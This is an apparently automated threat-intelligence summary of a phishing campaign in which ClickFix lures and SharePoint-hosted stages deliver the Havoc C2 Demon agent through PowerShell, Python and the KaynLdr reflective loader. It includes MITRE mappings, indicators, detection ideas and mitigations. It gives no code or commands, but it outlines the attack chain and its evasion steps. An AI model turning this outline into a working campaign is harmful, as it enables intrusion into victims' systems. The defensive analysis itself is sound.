Full Report
Cybersecurity researchers are calling attention to a new phishing campaign that employs the ClickFix technique to deliver an open-source command-and-control (C2) framework called Havoc. "The threat actor hides each malware stage behind a SharePoint site and uses a modified version of Havoc Demon in conjunction with the Microsoft Graph API to obscure C2 communications within trusted, well-known
Analysis Summary
# Tool/Technique: Havoc C2 Framework (via ClickFix/SharePoint Delivery)
## Overview
A phishing campaign utilizing the **ClickFix technique** to deliver the **Havoc Command and Control (C2) framework**. The attacker deploys the stages of the attack behind legitimate-looking SharePoint sites, using the **Microsoft Graph API** to obfuscate C2 communications within trusted cloud services.
## Technical Details
- Type: Malware/C2 Framework (Havoc Demon agent) and Delivery Technique (ClickFix)
- Platform: Windows (PowerShell execution, Python dependency)
- Capabilities: C2 communication, information gathering, file operations, command/payload execution, token manipulation, Kerberos attacks.
- First Seen: The specific combination described here was reported in March 2025.
## MITRE ATT&CK Mapping
* **TA0001 - Initial Access**
* T1566 - Phishing
* T1566.001 - Spearphishing Attachment (Initial HTML attachment)
* **TA0002 - Execution**
* T1059 - Command and Scripting Interpreter
* T1059.001 - PowerShell
* **TA0011 - Command and Control**
* T1071 - Application Layer Protocol
* T1071.001 - Web Protocols (Leveraging Microsoft Graph API for obfuscation)
## Functionality
### Core Capabilities
The attack chain involves several stages:
1. **Initial Lure:** A phishing email delivers an HTML attachment (`Documents.html`).
2. **ClickFix Trigger:** The HTML attachment displays a false error, tricking the user into copying and running a malicious PowerShell command into their terminal (ClickFix technique).
3. **Download and Execution:** The PowerShell command downloads and executes a subsequent PowerShell script from an adversary-controlled SharePoint server.
4. **Sandboxing Check:** The downloaded script checks if it is running in a sandbox environment.
5. **Dependency Acquisition:** If not sandboxed, the victim downloads and executes the Python interpreter (`pythonw.exe`) if it is not already present.
6. **Loader Execution:** A Python script is fetched, which serves as a shellcode loader. This loader is identified as **KaynLdr** (a reflective loader written in C and ASM).
7. **Payload Delivery:** KaynLdr launches an embedded DLL, which is the **Havoc Demon agent**.
### Advanced Features
* **C2 Obfuscation:** Havoc communications are concealed by routing traffic through the **Microsoft Graph API**, blending in with legitimate service traffic.
* **Reflective Loading:** Use of KaynLdr allows the Havoc DLL to be loaded directly into memory without dropping a traditional executable file.
* **Anti-Analysis:** The inline check for sandboxed environments prevents automated analysis.
## Indicators of Compromise
- File Hashes: *Not explicitly listed in the provided text.*
- File Names: `Documents.html`, `pythonw.exe` (downloaded dependency)
- Registry Keys: *Not explicitly listed in the provided text.*
- Network Indicators: SharePoint servers used for hosting stages (credentials/URLs are not provided, but the method relies on adversary-controlled SharePoint domains). Communications utilize the Microsoft Graph API endpoints.
- Behavioral Indicators: Execution of PowerShell scripts triggered by user input prompted by an HTML attachment; dynamic downloading of Python interpreter; use of KaynLdr reflective DLL loading; C2 beaconing utilizing the Microsoft Graph API structure.
## Associated Threat Actors
*The specific threat actor is not named in this summary text, only that "Hackers" or "The threat actor" is responsible.*
## Detection Methods
- Signature-based detection: *Not detailed, but signatures could target the known KaynLdr shellcode or file contents.*
- Behavioral detection: Detecting unusual PowerShell execution chained from an HTML file interaction; monitoring for the download and execution of `pythonw.exe` in an atypical, automated manner; monitoring network traffic for beaconing patterns disguised as Microsoft Graph API calls.
- YARA rules: *Not detailed in the provided text.*
## Mitigation Strategies
- Prevention measures: Restricting execution of downloaded scripts (e.g., via Application Control); tightly controlling macro/script execution from untrusted sources.
- Hardening recommendations: Implementing strong security policies for Microsoft 365/SharePoint to limit unauthorized external file hosting or access; deploying endpoint detection and response (EDR) capable of monitoring reflective loading techniques (like KaynLdr).
## Related Tools/Techniques
* **Havoc:** An open-source C2 framework known for its flexibility and evasion capabilities.
* **ClickFix Technique:** A social engineering method relying on users copying and pasting commands due to a perceived error message in an HTML rendering.
* **KaynLdr:** A specific reflective loader used in this chain.